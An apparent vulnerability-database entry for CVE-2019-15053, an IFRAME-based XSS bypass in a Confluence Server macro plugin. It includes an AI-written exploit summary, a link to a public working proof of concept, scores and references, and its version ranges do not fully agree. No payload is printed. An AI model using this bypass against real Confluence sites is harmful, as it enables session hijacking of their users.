CVE-2019-15053

MEDIUM

HTML Include and Replace Macro < 1.4.2 - Cross-Site Scripting via IFRAME Element

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 1 public exploit for CVE-2019-15053. PoCs published by l0nax.

AI-analyzed exploit summary This repository contains a functional proof-of-concept for CVE-2019-15053, a stored XSS vulnerability in the HTML Include and Replace Macro plugin for Confluence Server. The exploit demonstrates how an attacker can bypass the 'includeScripts' setting to execute arbitrary JavaScript, leading to session hijacking.

Description

The "HTML Include and replace macro" plugin before 1.5.0 for Confluence Server allows a bypass of the includeScripts=false XSS protection mechanism via vectors involving an IFRAME element.

Exploits (1)

nomisec WORKING POC
by l0nax · poc
https://github.com/l0nax/CVE-2019-15053

This repository contains a functional proof-of-concept for CVE-2019-15053, a stored XSS vulnerability in the HTML Include and Replace Macro plugin for Confluence Server. The exploit demonstrates how an attacker can bypass the 'includeScripts' setting to execute arbitrary JavaScript, leading to session hijacking.

Classification
Working Poc 95%
Attack Type
Xss
Complexity
Trivial
Reliability
Reliable
Target: HTML Include and Replace Macro for Confluence Server (versions 1.4.2 and before)
Auth required
Prerequisites: Access to upload an HTML file to a public server · Ability to create/edit a Confluence page with the vulnerable macro
devstral-2 · analyzed Feb 18, 2026 Full analysis →

References (2)

Core 2
Core References
Exploit, Third Party Advisory x_refsource_misc
https://github.com/l0nax/CVE-2019-15053

Scores

CVSS v3 6.8
EPSS 0.0132
EPSS Percentile 67.2%
Attack Vector NETWORK
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L

Details

CWE
CWE-79
Status published
Products (1)
atlassian/html_include_and_replace_macro 1.1 - 1.4.2
Published Aug 14, 2019
Tracked Since Feb 18, 2026